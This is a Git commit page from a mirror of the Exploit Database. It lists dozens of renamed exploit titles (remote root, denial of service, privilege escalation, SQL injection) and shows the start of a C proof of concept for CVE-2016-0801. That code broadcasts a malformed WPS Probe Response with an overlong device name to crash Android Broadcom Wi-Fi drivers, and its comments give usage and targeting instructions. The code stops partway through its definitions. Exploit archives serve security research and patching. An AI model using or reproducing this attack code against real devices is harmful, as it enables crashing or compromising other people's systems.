bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-05-12

Browse source 
22 new exploits

PoPToP PPTP <= 1.1.4-b3 - Remote Root Exploit (poptop-sane.c)
PoPToP PPTP <= 1.1.4-b3 - 'poptop-sane.c' Remote Root Exploit

Atftpd 0.6 - Remote Root Exploit (atftpdx.c)
Atftpd 0.6 - 'atftpdx.c' Remote Root Exploit

Yahoo Messenger 5.5 - Remote Exploit (DSR-ducky.c)
Yahoo Messenger 5.5 - 'DSR-ducky.c' Remote Exploit

CCBILL CGI Remote Exploit for whereami.cgi (ccbillx.c)
CCBILL CGI - 'ccbillx.c' whereami.cgi Remote Exploit

Cisco IOS IPv4 Packet Denial of Service Exploit (cisco-bug-44020.c)
Cisco IOS - 'cisco-bug-44020.c' IPv4 Packet Denial of Service Exploit

wu-ftpd 2.6.2 - Remote Denial of Service Exploit (wuftpd-freezer.c)
wu-ftpd 2.6.2 - 'wuftpd-freezer.c' Remote Denial of Service Exploit

Microsoft Windows - (Jolt2.c) Denial of Service Exploit
Microsoft Windows - 'Jolt2.c' Denial of Service Exploit

TCP SYN Denial of Service Exploit (bang.c)
TCP SYN - 'bang.c' Denial of Service Exploit

Apache HTTPd - Arbitrary Long HTTP Headers DoS (C)
Apache HTTPd - Arbitrary Long HTTP Headers DoS

Linux Kernel <= 2.4.26- File Offset Pointer Handling Memory Disclosure Exploit
Linux Kernel <= 2.4.26 - File Offset Pointer Handling Memory Disclosure Exploit

Linux Kernel 2.6.x (Slackware 9.1/ Debian 3.0) - chown() Group Ownership Alteration Exploit
Linux Kernel 2.6.x (Slackware 9.1 / Debian 3.0) - chown() Group Ownership Alteration Exploit

Veritas Backup Exec Agent 8.x/9.x - Browser Overflow (C)
Veritas Backup Exec Agent 8.x/9.x - Browser Overflow

Apache OpenSSL - Remote Exploit (Multiple Targets) (OpenFuckV2.c)
Apache OpenSSL - 'OpenFuckV2.c' Remote Exploit

CA License Server (GETCONFIG) Remote Buffer Overflow Exploit (c)
CA License Server (GETCONFIG) Remote Buffer Overflow Exploit

Aeon 0.2a - Local Linux Exploit (C)
Aeon 0.2a - Local Linux Exploit

Linux Kernel 2.4 / 2.6 - bluez Local Root Privilege Escalation Exploit (3)
Linux Kernel 2.4.x / 2.6.x - 'Bluez' Bluetooth Signed Buffer Index Local Root (3)

nbSMTP <= 0.99 (util.c) Client-Side Command Execution Exploit
nbSMTP <= 0.99 - 'util.c' Client-Side Command Execution Exploit

SuSE Linux <= 9.3 / 10 - (chfn) Local Root Privilege Escalation Exploit
Linux chfn (SuSE <= 9.3 / 10) - Local Privilege Escalation Exploit

SugarSuite Open Source <= 4.0beta Remote Code Execution Exploit (c)
SugarSuite Open Source <= 4.0beta - Remote Code Execution Exploit
Microsoft Windows IIS - Malformed HTTP Request Denial of Service Exploit (c)
Microsoft Windows IIS - Malformed HTTP Request Denial of Service Exploit (pl)
Microsoft Windows IIS - Malformed HTTP Request Denial of Service Exploit
Microsoft Windows IIS - Malformed HTTP Request Denial of Service Exploit (Perl)

OpenVMPSd <= 1.3 - Remote Format String Exploit (Multiple Targets)
OpenVMPSd <= 1.3 - Remote Format String Exploit

Ubuntu Breezy 5.10 Installer Password Disclosure Vulnerability
Ubuntu Breezy 5.10 - Installer Password Disclosure Vulnerability

X.Org X11 (X11R6.9.0/X11R7.0) - Local Root Privilege Escalation Exploit
X.Org X11 (X11R6.9.0/X11R7.0) - Local Privilege Escalation Exploit

DataLife Engine <= 4.1 - Remote SQL Injection Exploit (php)
DataLife Engine <= 4.1 - Remote SQL Injection Exploit (PHP)
Opera 9 IRC Client Remote Denial of Service Exploit (c)
Opera 9 IRC Client Remote Denial of Service Exploit (py)
Opera 9 - IRC Client Remote Denial of Service Exploit
Opera 9 IRC Client - Remote Denial of Service Exploit (Python)

Microsoft Windows PNG File IHDR Block Denial of Service Exploit PoC (c)
Microsoft Windows - PNG File IHDR Block Denial of Service Exploit PoC (1)

Microsoft Windows PNG File IHDR Block Denial of Service Exploit PoC (c) (2)
Microsoft Windows - PNG File IHDR Block Denial of Service Exploit PoC (2)

Microsoft Internet Explorer (VML) Remote Buffer Overflow Exploit (SP2) (pl)
Microsoft Internet Explorer (VML) - Remote Buffer Overflow Exploit (SP2) (Perl)

Microsoft Internet Explorer WebViewFolderIcon setSlice() Exploit (pl)
Microsoft Internet Explorer - WebViewFolderIcon setSlice() Exploit (Perl)

Microsoft Internet Explorer WebViewFolderIcon setSlice() Exploit (c)
Microsoft Internet Explorer - WebViewFolderIcon setSlice() Exploit

cPanel <= 10.8.x - (cpwrap via mysqladmin) Local Root Exploit (php)
cPanel <= 10.8.x - (cpwrap via mysqladmin) Local Root Exploit (PHP)

Xfire <= 1.6.4 - Remote Denial of Service Exploit (pl)
Xfire <= 1.6.4 - Remote Denial of Service Exploit (Perl)

Microsoft Windows NetpManageIPCConnect Stack Overflow Exploit (py)
Microsoft Windows NetpManageIPCConnect - Stack Overflow Exploit (Python)

VUPlayer <= 2.44 - (.M3U UNC Name) Buffer Overflow Exploit (c)
VUPlayer <= 2.44 - (.M3U UNC Name) Buffer Overflow Exploit

QK SMTP <= 3.01 (RCPT TO) Remote Buffer Overflow Exploit (pl)
QK SMTP <= 3.01 - (RCPT TO) Remote Buffer Overflow Exploit (Perl)

Ubuntu/Debian Apache 1.3.33/1.3.34 - (CGI TTY) Local Root Exploit
Apache 1.3.33/1.3.34 (Ubuntu / Debian) - (CGI TTY) Local Root Exploit

WarFTP 1.65 (USER) Remote Buffer Overlow Exploit (multiple targets)
WarFTP 1.65 (USER) Remote Buffer Overlow Exploit

XOOPS Module WF-Snippets <= 1.02 (c) BLIND SQL Injection Exploit
XOOPS Module WF-Snippets <= 1.02 (c) - BLIND SQL Injection Exploit

IrfanView 3.99 - (.ani) Local Buffer Overflow Exploit (multiple targets)
IrfanView 3.99 - (.ani) Local Buffer Overflow Exploit

3proxy 0.5.3g logurl() Remote Buffer Overflow Exploit (Win32) (pl)
3proxy 0.5.3g logurl() - Remote Buffer Overflow Exploit (Win32) (Perl)

Download Accelerator Plus - DAP 8.x m3u File Buffer Overflow Exploit (c)
Download Accelerator Plus - DAP 8.x m3u File Buffer Overflow Exploit
fuzzylime CMS 3.01 (polladd.php poll) Remote Code Execution Exploit (php)
fuzzylime CMS 3.01 (polladd.php poll) Remote Code Execution Exploit (pl)
fuzzylime CMS 3.01 (polladd.php poll) Remote Code Execution Exploit (PHP)
fuzzylime CMS 3.01 - (polladd.php poll) Remote Code Execution Exploit (Perl)

IntelliTamper 2.07 - (map file) Local Arbitrary Code Execution Exploit (pl)
IntelliTamper 2.07 - (map file) Local Arbitrary Code Execution Exploit (Perl)

IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow Exploit (c)
IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow Exploit

BIND 9.x - Remote DNS Cache Poisoning Flaw Exploit (py)
BIND 9.x - Remote DNS Cache Poisoning Flaw Exploit (Python)

BIND 9.x - Remote DNS Cache Poisoning Flaw Exploit (c)
BIND 9.x - Remote DNS Cache Poisoning Flaw Exploit

CoolPlayer 2.19 - (Skin File) Local Buffer Overflow Exploit (py)
CoolPlayer 2.19 - (Skin File) Local Buffer Overflow Exploit (Python)

Browser3D 3.5 - (.sfs) Local Stack Overflow Exploit (c)
Browser3D 3.5 - (.sfs) Local Stack Overflow Exploit

Microsoft Internet Explorer 7 - Memory Corruption Exploit (MS09-002) (py)
Microsoft Internet Explorer 7 - Memory Corruption Exploit (MS09-002) (Python)

EFS Easy Chat Server Authentication Request Buffer Overflow Exploit (pl)
EFS Easy Chat Server - Authentication Request Buffer Overflow Exploit (Perl)

CastRipper 2.50.70 - (.m3u) Universal Stack Overflow Exploit (py)
CastRipper 2.50.70 - (.m3u) Universal Stack Overflow Exploit (Python)

Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (php)
Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (PHP)

Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (pl)
Microsoft IIS 6.0 WebDAV - Remote Authentication Bypass Exploit (Perl)

kloxo 5.75 - (24 issues) Multiple Vulnerabilities
kloxo 5.75 - Multiple Vulnerabilities

Mozilla Firefox 3.5 (Font tags) Remote Heap Spray Exploit (pl)
Mozilla Firefox 3.5 - (Font tags) Remote Heap Spray Exploit (Perl)

Adobe Acrobat 9.1.2 NOS - Local Privilege Escalation Exploit (C)
Adobe Acrobat 9.1.2 NOS - Local Privilege Escalation Exploit

MailEnable 1.52 HTTP Mail Service Stack BoF Exploit PoC
MailEnable 1.52 - HTTP Mail Service Stack BoF Exploit PoC

(Ubuntu 9.10/10.04) PAM 1.1.0 - MOTD File Tampering (Privilege Escalation)
Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation Local Root Exploit (1)

Cacti 0.8.7e: Multiple Security Issues
Cacti 0.8.7e - Multiple Vulnerabilities

(Tod Miller's) Sudo/SudoEdit 1.6.x < 1.6.9p21 & 1.7.x < 1.7.2p4 - Local Root Exploit
(Tod Miller's) Sudo/SudoEdit 1.6.x / 1.7.x (<= 1.6.9p21 / <= 1.7.2p4) - Local Root Exploit

PAM 1.1.0 MOTD (Ubuntu 9.10/10.04) - Local Root Exploit
Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation Local Root Exploit (2)

Linux Kernel < 2.6.36-rc1 CAN BCM (Ubuntu 10.04 / 2.6.32-21) - Privilege Escalation Exploit
Linux Kernel < 2.6.36-rc1 CAN BCM (Ubuntu 10.04 / 2.6.32) - Privilege Escalation Exploit

Ubuntu Linux - 'mountall' - Local Privilege Escalation Vulnerability
mountall <= 2.15.2 (Ubuntu 10.04/10.10) - Local Privilege Escalation Vulnerability

Cilem Haber 1.4.4 (Tr) - Database Disclosure Exploit (.py)
Cilem Haber 1.4.4 (Tr) - Database Disclosure Exploit (Python)

PHP Hosting Directory 2.0 Database Disclosure Exploit (.py)
PHP Hosting Directory 2.0 Database Disclosure Exploit (Python)

systemtap - Local Root Privilege Escalation Vulnerability
systemtap - Local Privilege Escalation Vulnerability

Linux Kernel < 2.6.34 CAP_SYS_ADMIN x86 & x64 (Ubuntu 110.10) - Local Privilege Escalation Exploit (2)
Linux Kernel < 2.6.34 CAP_SYS_ADMIN x86 & x64 (Ubuntu 11.10) - Local Privilege Escalation Exploit (2)

Kunena < 1.5.13_ < 1.6.3 - SQL Injection Vulnerability
Kunena < 1.5.13 / < 1.6.3 - SQL Injection Vulnerability

HP OpenView NNM 7.53_ 7.51 OVAS.EXE Pre-Authentication Stack Buffer Overflow
HP OpenView NNM 7.53/7.51 OVAS.EXE Pre-Authentication Stack Buffer Overflow

Safari 5.0.6_ 5.1 - SVG DOM Processing PoC
Safari 5.0.6/5.1 - SVG DOM Processing PoC

Ubuntu <= 11.04 ftp client Local Buffer Overflow Crash PoC
FTP Client (Ubuntu <= 11.04) - Local Buffer Overflow Crash PoC

Acpid 1:2.0.10-1ubuntu2 - Privilege Boundary Crossing Vulnerability
Acpid 1:2.0.10-1ubuntu2 (Ubuntu 11.10/11.04) - Privilege Boundary Crossing Local Root Exploit
RedHat Linux <= 6.0_ Slackware Linux <= 4.0 Termcap tgetent() Buffer Overflow (1)
RedHat Linux <= 6.0_ Slackware Linux <= 4.0 Termcap tgetent() Buffer Overflow (2)
RedHat Linux <= 6.0 / Slackware Linux <= 4.0 - Termcap tgetent() Buffer Overflow (1)
RedHat Linux <= 6.0 / Slackware Linux <= 4.0 - Termcap tgetent() Buffer Overflow (2)
Linux Kernel 2.2.x/2.4 .0-test1_ SGI ProPack 1.2/1.3 - Capabilities Local Root (sendmail) Vulnerability (1)
Linux Kernel 2.2.x/2.4 .0-test1_ SGI ProPack 1.2/1.3 - Capabilities Local Root (sendmail <= 8.10.1) Vulnerability (2)
Linux Kernel 2.2.x/2.4.0-test1_ SGI ProPack 1.2/1.3 - Capabilities Local Root (sendmail) Vulnerability (1)
Linux Kernel 2.2.x/2.4.0-test1_ SGI ProPack 1.2/1.3 - Capabilities Local Root (sendmail <= 8.10.1) Vulnerability (2)

Debian 2.x_RedHat 6.2_IRIX 5/6_ Solaris 2.x Mail Reply-To Field Vulnerability
Debian 2.x_ RedHat 6.2_ IRIX 5/6_ Solaris 2.x - Mail Reply-To Field Vulnerability

Pure-FTPd 1.0.21 (CentOS 6.2 & Ubuntu 8.04) - Crash PoC (Null Pointer Dereference)
Pure-FTPd 1.0.21 (CentOS 6.2 / Ubuntu 8.04) - Crash PoC (Null Pointer Dereference)
FreeBSD 2.x_HP-UX 9/10/11_kernel 2.0.3_Windows NT 4.0/Server 2003_NetBSD 1 - loopback (land.c) DoS (1)
FreeBSD 2.x_HP-UX 9/10/11_kernel 2.0.3_Windows NT 4.0/Server 2003_NetBSD 1 - loopback (land.c) DoS (2)
FreeBSD 2.x_HP-UX 9/10/11_kernel 2.0.3_Windows NT 4.0/Server 2003_NetBSD 1 - loopback (land.c) DoS (3)
FreeBSD 2.x_HP-UX 9/10/11_kernel 2.0.3_Windows NT 4.0/Server 2003_NetBSD 1 - loopback (land.c) DoS (4)
FreeBSD 2.x_HP-UX 9/10/11_kernel 2.0.3_Windows NT 4.0/Server 2003_NetBSD 1 - loopback (land.c) DoS (5)
FreeBSD 2.x_HP-UX 9/10/11_kernel 2.0.3_Windows NT 4.0/Server 2003_NetBSD 1 - 'land.c' loopback DoS (1)
FreeBSD 2.x_HP-UX 9/10/11_kernel 2.0.3_Windows NT 4.0/Server 2003_NetBSD 1 - 'land.c' loopback DoS (2)
FreeBSD 2.x_HP-UX 9/10/11_kernel 2.0.3_Windows NT 4.0/Server 2003_NetBSD 1 - 'land.c' loopback DoS (3)
FreeBSD 2.x_HP-UX 9/10/11_kernel 2.0.3_Windows NT 4.0/Server 2003_NetBSD 1 - 'land.c' loopback DoS (4)
FreeBSD 2.x_HP-UX 9/10/11_kernel 2.0.3_Windows NT 4.0/Server 2003_NetBSD 1 - 'land.c' loopback DoS (5)

cPanel 5.0 - Openwebmail Local Privileges Escalation Vulnerability
cPanel 5.0 - Openwebmail Local Privilege Escalation Vulnerability

Linux-PAM 0.77 - Pam_Wheel Module getlogin() Username Spoofing Privileged Escalation Vulnerability
Linux PAM 0.77 - Pam_Wheel Module getlogin() Username Spoofing Privilege Escalation Vulnerability

Totem Movie Player (Ubuntu) 3.4.3 - Stack Corruption
Totem Movie Player 3.4.3 (Ubuntu) - Stack Corruption

Flightgear 2.0_ 2.4 - Remote Format String Exploit
Flightgear 2.0/2.4 - Remote Format String Exploit

Opera 7.x_ Firefox 1.0_ Internet Explorer 6.0 - Information Disclosure Weakness
Opera 7.x/Firefox 1.0/Internet Explorer 6.0 - Information Disclosure Weakness
Linux Kernel 2.4.x / 2.6.x - Bluetooth Signed Buffer Index PoC Vulnerability (1)
Linux Kernel 2.4.x / 2.6.x - Bluetooth Signed Buffer Index Local Root Vulnerability (2)
Linux Kernel 2.4.x / 2.6.x - Bluetooth Signed Buffer Index Local Root Vulnerability (3)
Linux Kernel 2.4.x / 2.6.x - Bluetooth Signed Buffer Index Local Root Vulnerability (4)
Linux Kernel 2.4.x / 2.6.x - Bluetooth Signed Buffer Index PoC (1)
Linux Kernel 2.4.x / 2.6.x - Bluetooth Signed Buffer Index Local Root (2)
Linux Kernel <= 2.4.30 / <= 2.6.11.5 - Bluetooth bluez_sock_create Local Root Vulnerability

Linux Kernel 2.6.37 <= 3.x.x (CentOS) - PERF_EVENTS Local Root Exploit
Linux Kernel 2.6.32 <= 3.x.x (CentOS) - PERF_EVENTS Local Root Exploit

Linux Kernel 3.8.x - open-time Capability file_ns_capable() Privilege Escalation
Linux Kernel < 3.8.x - open-time Capability file_ns_capable() Privilege Escalation

OSX <= 10.8.4 - Local Root Privilege Escalation (py)
OSX <= 10.8.4 - Local Privilege Escalation (Python)

Moodle 2.3.8_ 2.4.5 - Multiple Vulnerabilities
Moodle 2.3.8/2.4.5 - Multiple Vulnerabilities

IBM AIX 6.1 / 7.1 - Local Root Privilege Escalation
IBM AIX 6.1 / 7.1 - Local Privilege Escalation

glibc and eglibc 2.5_ 2.7_ 2.13 - Buffer Overflow Vulnerability
glibc and eglibc 2.5/2.7/2.13 - Buffer Overflow Vulnerability

StatusNet/Laconica 0.7.4_ 0.8.2_ 0.9.0beta3 - Arbitrary File Reading
StatusNet/Laconica 0.7.4/0.8.2/0.9.0beta3 - Arbitrary File Reading

Links_ ELinks 'smbclient' Remote Command Execution Vulnerability
Links_ ELinks 'smbclient' - Remote Command Execution Vulnerability

Flyspray 0.9.9 - Information Disclosure_ HTML Injection and Cross-Site Scripting Vulnerabilities
Flyspray 0.9.9 - Information Disclosure/HTML Injection/Cross-Site Scripting

Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10) - Local Root (CONFIG_X86_X32=y)
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10) - 'CONFIG_X86_X32=y' Local Root Exploit

Symantec Endpoint Protection Manager 11.0_ 12.0_ 12.1 - Remote Command Execution Exploit
Symantec Endpoint Protection Manager 11.0/12.0/12.1 - Remote Command Execution Exploit

ownCloud 4.0.x_ 4.5.x (upload.php filename param) - Remote Code Execution
ownCloud 4.0.x/4.5.x (upload.php filename param) - Remote Code Execution
Procentia IntelliPen 1.1.12.1520 (Data.aspx_ value param) - Blind SQL Injection
Vtiger CRM 5.4.0_ 6.0 RC_ 6.0.0 GA (browse.php file param) - Local File Inclusion
Procentia IntelliPen 1.1.12.1520 - data.aspx Blind SQL Injection
Vtiger CRM 5.4.0/6.0 RC/6.0.0 GA (browse.php file param) - Local File Inclusion
Haihaisoft HUPlayer 1.0.4.8 - (.m3u_ .pls_ .asx) Buffer Overflow (SEH)
Haihaisoft Universal Player 1.5.8 - (.m3u_ .pls_ .asx) Buffer Overflow (SEH)
Haihaisoft HUPlayer 1.0.4.8 - (.m3u/.pls/.asx) Buffer Overflow (SEH)
Haihaisoft Universal Player 1.5.8 - (.m3u/.pls/.asx) Buffer Overflow (SEH)

JIRA Issues Collector Directory Traversal
JIRA Issues Collector - Directory Traversal

CMSimple 4.4_ 4.4.2 - Remote File Inclusion
CMSimple 4.4/4.4.2 - Remote File Inclusion

Core FTP Server 1.2_ build 535_ 32-bit - Crash PoC
Core FTP Server 1.2 build 535 32-bit - Crash PoC

Samba <= 3.4.5 - Symlink Directory Traversal Vulnerability (C)
Samba <= 3.4.5 - Symlink Directory Traversal Vulnerability

Microsoft Internet Explorer 8 - Fixed Col Span ID Full ASLR_ DEP & EMET 4.1.x Bypass (MS12-037)
Microsoft Internet Explorer 8 - Fixed Col Span ID Full ASLR + DEP + EMET 4.1.x Bypass (MS12-037)

Linux Kernel < 3.2.0-23 (Ubuntu 12.04) - ptrace/sysret Local Privilege Escalation
Linux Kernel < 3.2.0-23  (Ubuntu 12.04) - ptrace/sysret Local Privilege Escalation

Symantec Endpoint Protection 11.x_ 12.x - Kernel Pool Overflow
Symantec Endpoint Protection 11.x/12.x - Kernel Pool Overflow

Linux Kernel 3.16.1 - Remount FUSE Exploit
Linux Kernel < 3.16.1 - Remount FUSE Local Root Exploit

Microsoft Internet Explorer 8 - Fixed Col Span ID Full ASLR_ DEP & EMET 5.0 Bypass (MS12-037)
Microsoft Internet Explorer 8 - Fixed Col Span ID Full ASLR + DEP + EMET 5.0 Bypass (MS12-037)

Rejetto HTTP File Server (HFS) 2.3a_ 2.3b_ 2.3c - Remote Command Execution
Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution

Microsoft Internet Explorer 8 - Fixed Col Span ID Full ASLR_ DEP & EMET 5.1 Bypass (MS12-037)
Microsoft Internet Explorer 8 - Fixed Col Span ID Full ASLR + DEP + EMET 5.1 Bypass (MS12-037)

Mac OS X - IOKit Keyboard Driver Root Privilege Escalation
Mac OS X - IOKit Keyboard Driver Privilege Escalation

Liferay Portal 7.0.0 M1_ 7.0.0 M2_ 7.0.0 M3 - Pre-Auth RCE
Liferay Portal 7.0.0 M1/7.0.0 M2/7.0.0 M3 - Pre-Auth RCE

vBulletin MicroCART 1.1.4 - Arbitrary File(s) Deletion_ SQL Injection & XSS
vBulletin MicroCART 1.1.4 - Arbitrary File(s) Deletion/SQL Injection/XSS

MalwareBytes Anti-Exploit 1.03.1.1220_ 1.04.1.1012 Out-of-bounds Read DoS
MalwareBytes Anti-Exploit 1.03.1.1220/1.04.1.1012 Out-of-bounds Read DoS

JBoss AS 3_ 4_ 5_ 6 - Remote Command Execution
JBoss AS 3/4/5/6 - Remote Command Execution

Mac OS X < 10.7.5_ 10.8.2_ 10.9.5 10.10.2 - rootpipe Local Privilege Escalation
Mac OS X < 10.7.5/10.8.2/10.9.5/10.10.2 - rootpipe Local Privilege Escalation

Alienvault OSSIM/USM 4.14_ 4.15_ and 5.0 - Multiple Vulnerabilities
Alienvault OSSIM/USM 4.14/4.15/5.0 - Multiple Vulnerabilities

Pandora FMS 5.0_ 5.1 - Authentication Bypass
Pandora FMS 5.0/5.1 - Authentication Bypass

Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - overlayfs Local Root (Shell)
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - overlayfs Local Root Shell

Cisco AnyConnect Secure Mobility 2.x_ 3.x_ 4.x - Client DoS PoC
Cisco AnyConnect Secure Mobility 2.x/3.x/4.x - Client DoS PoC

Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - overlayfs Local Root (Shadow File)
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - overlayfs Privilege Escalation (Access /etc/shadow)

Orchard CMS 1.7.3_ 1.8.2_ 1.9.0 - Stored XSS Vulnerability
Orchard CMS 1.7.3/1.8.2/1.9.0 - Stored XSS Vulnerability

Ubuntu 14.04 NetKit FTP Client - Crash/DoS PoC
NetKit FTP Client (Ubuntu 14.04) - Crash/DoS PoC

Interspire Email Marketer Cross Site Scripting_ HTML Injection_ and SQL Injection Vulnerabilities
Interspire Email Marketer - (Cross Site Scripting/HTML Injection/SQL Injection) Multiple Vulnerabilities

BigDump Cross Site Scripting_ SQL Injection_ and Arbitrary File Upload Vulnerabilities
BigDump - (Cross Site Scripting/SQL Injection/Arbitrary File Upload) Multiple Vulnerabilities

Elastix < 2.5 _ PHP Code Injection Exploit
Elastix < 2.5 - PHP Code Injection Exploit

Microsoft Office Excel 2007_ 2010_ 2013 - BIFFRecord Use-After-Free
Microsoft Office Excel 2007/2010/2013 - BIFFRecord Use-After-Free

OS X Regex Engine (TRE) - Integer Signedness and Overflow Issues
OS X Regex Engine (TRE) - (Integer Signedness and Overflow) Multiple Vulnerabilities

Linux Kernel 3.3.5 - 'CLONE_NEWUSER|CLONE_FS' Local Privilege Escalation Vulnerability
Linux Kernel 3.0 < 3.3.5 - 'CLONE_NEWUSER|CLONE_FS' Local Privilege Escalation Vulnerability

Linux Kernel <=4.3.3 (Ubuntu 14.04_ 15.10) - overlayfs Local Root Exploit
Linux Kernel <= 4.3.3 (Ubuntu 14.04/15.10) - overlayfs Local Root Exploit

Exim < 4.86.2 - Local Root Privilege Escalation
Exim < 4.86.2 - Local Privilege Escalation
RHEL 7.1 (and CentOS) Kernel 3.10.0-229.x - snd-usb-audio Crash PoC
RHEL 7.1 (and CentOS) Kernel 3.10.0-229.x - iowarrior driver Crash PoC
Linux Kernel 3.10.0-229.x (RHEL 7.1. CentOS) - snd-usb-audio Crash PoC
Linux Kernel 3.10.0-229.x (RHEL 7.1. CentOS) - iowarrior driver Crash PoC

Trend Micro Deep Discovery Inspector 3.8_ 3.7 - CSRF Vulnerabilities
Trend Micro Deep Discovery Inspector 3.8/3.7 - CSRF Vulnerabilities

FireEye - Privilege Escalation to root from Malware Input Processor (uid=mip)
FireEye - Malware Input Processor (uid=mip) Privilege Escalation Exploit

Novell Service Desk 7.1.0_ 7.0.3 and 6.5 - Multiple Vulnerabilities
Novell Service Desk 7.1.0/7.0.3 and 6.5 - Multiple Vulnerabilities

Internet Explorer 9_ 10_ 11 - CDOMStringDataList::InitFromString Out-of-Bounds Read (MS15-112)
Internet Explorer 9/10/11 - CDOMStringDataList::InitFromString Out-of-Bounds Read (MS15-112)

Linux (Ubuntu 14.04.3) - perf_event_open() Can Race with execve() (/etc/shadow)
Linux Kernel (Ubuntu 14.04.3) - perf_event_open() Can Race with execve() (/etc/shadow)

Linux (Ubuntu 16.04) - Reference Count Overflow Using BPF Maps
Linux Kernel (Ubuntu 16.04) - Reference Count Overflow Using BPF Maps
Android Broadcom Wi-Fi Driver - Memory Corruption
CIScan 1.00 - Hostname/IP Field SEH Overwrite PoC
FileZilla FTP Client 3.17.0.0 - Unquoted Path Privilege Escalation
Intuit QuickBooks Desktop 2007 - 2016 - Arbitrary Code Execution
This commit is contained in:
Offensive Security 2016-05-12 05:03:21 +00:00
parent 52e862d62a
commit 614fb1caf8
29 changed files with 2504 additions and 164 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

305
files.csv
View file

File diff suppressed because it is too large Load diff

664
platforms/android/dos/39801.c Executable file
View file

@ -0,0 +1,664 @@
/*
* Copyright (C) 2016 by AbdSec Core Team <ok@abdsec.com>
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
/*
USAGE
# airmon-ng start wlan0
# gcc -o wps wps.c -Wall -O2 -DDEBUG -DSHOW
# ./wps
Total Wps Length: 118
[99] SSID: DON'T_CONNECT
DEST: ff ff ff ff ff ff
Sending Packet (315 byte) ...
...
*/
/*
This is a proof of concept for CVE-2016-0801 Bug
the program proceeds as follows:
o A new WPS Probe Response packet is generated.
o The device_name field of this packet is filled with some string that's longer than hundered characters.
o This packet is broadcasted on the network( interface needs to be on monitor mode for this to work).
At this point the device picking up this packet, identified by its mac address(DESTINATION_MAC), should have crashed.
the following patch shows how contributor fixed the bug
https://android.googlesource.com/kernel/msm/+/68cdc8df1cb6622980b791ce03e99c255c9888af%5E!/#F0
Wireshark filter for displaying PROBE RESPONSE packets: wlan.fc.type_subtype == 0x05
Reference WPS Architecture: http://v1ron.ru/downloads/docs/Wi-Fi%20Protected%20Setup%20Specification%201.0h.pdf
Acımasız Tom'a Sevgilerle :)
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <netpacket/packet.h>
#include <linux/wireless.h>
#include <assert.h>
#define calc_size(x) (sizeof(x) - 2)
#define reverse8(x) (x<<4&0xf0) | ((x>>4)&0x0f) /* 0XAB becomes 0XBA */
#define reverse16(x) (x&0xff00)>>8 | (x&0x00ff)<<8 /* 0XABCD becomes 0XCDAB */
#define PROBE_REQUEST 0x04
#define PROBE_RESPONSE 0x05
#define BEACON 0x08
#define SOURCE_MAC "\xaa\xbb\xdd\x55\xee\xcc"
/* Do NOT forget to set your target's mac address */
#define DESTINATION_MAC "\xff\xff\xff\xff\xff\xfc"
#define SSID "DON'T_CONNECT"
/* Tag Number Definitions */
#define SSID_t 0x00
#define RATES_t 0x01
#define DS_t 0x03
#define ERP_t 0x2a
#define ESR_t 0x32
#define RSN_t 0x30
#define HTC_t 0x2d
#define HTI_t 0x3d
#define VENDOR_t 0xdd
#define OUI_AES "\x00\x0f\xac"
#define OUI_Microsof "\x00\x50\xf2"
/* Data Element Type Definitions for WPS Probe Response */
#define VERSION 0x104a
#define WPS_STATE 0x1044
#define SELECTED_REGISTRAR 0x1041
#define DEVICE_PASSWORD_ID 0x1012
#define SELECTED_REGISTRAR_CONFIG_METHODS 0x1053
#define RESPONSE_TYPE 0x103b
#define UUID_E 0x1047
#define MANUFACTURER 0x1021
#define MODEL_NAME 0x1023
#define MODEL_NUMBER 0x1024
#define SERIAL_NUMBER 0x1042
#define PRIMARY_DEVICE_TYPE 0x1054
#define WPS_ID_DEVICE_NAME 0x1011
#define CONFIG_METHODS 0x1008
/* Just cloned from a sniffed packet */
#define RATES_v "\x82\x84\x8b\x96"
#define ESRATES_v "\x8c\x12\x98\x24\xb0\x48\x60\x6c"
/* Wps Version */
#define WV 0x10
/* Wps State */
#define WS 0x01
/* Selected Registrar */
#define SR 0x02
/* Response Type */
#define RT 0x03
/* For Device Password ID */
#define PIN 0x0000
/* For Selected Registrar Config Methods */
#define SRCM 0x018c
/* For Config Methods */
#define CM 0x0004
/* For Broadcast */
#define DELAY 200000
/* !!! Monitor mode on !!!*/
#define IFACE "mon0"
#define MAX_SIZE 1024
/* Max Tag Length */
#define MAX_TL 0xff
typedef uint8_t u8;
typedef uint16_t u16;
/* Common Tags */
typedef struct {
/* Tag Number */
u8 tn;
/* Tag Length */
u8 tl;
} com_a;
typedef struct {
u8 oui[3];
u8 type;
} com_b;
typedef struct data_definition{
/* Data Element Type */
u16 det;
/* Data Element Length */
u16 del;
} def;
/* Common Wps Tags */
typedef struct wtag_8 {
def init;
u8 item;
} __attribute__((packed)) wtag_a;
typedef struct wtag_16 {
def init;
u16 item;
} __attribute__((packed)) wtag_b;
typedef struct wtag_point {
def init;
char *item;
} __attribute__((packed)) wtag_c;
struct ie80211_hdr {
u8 type;
u8 flags;
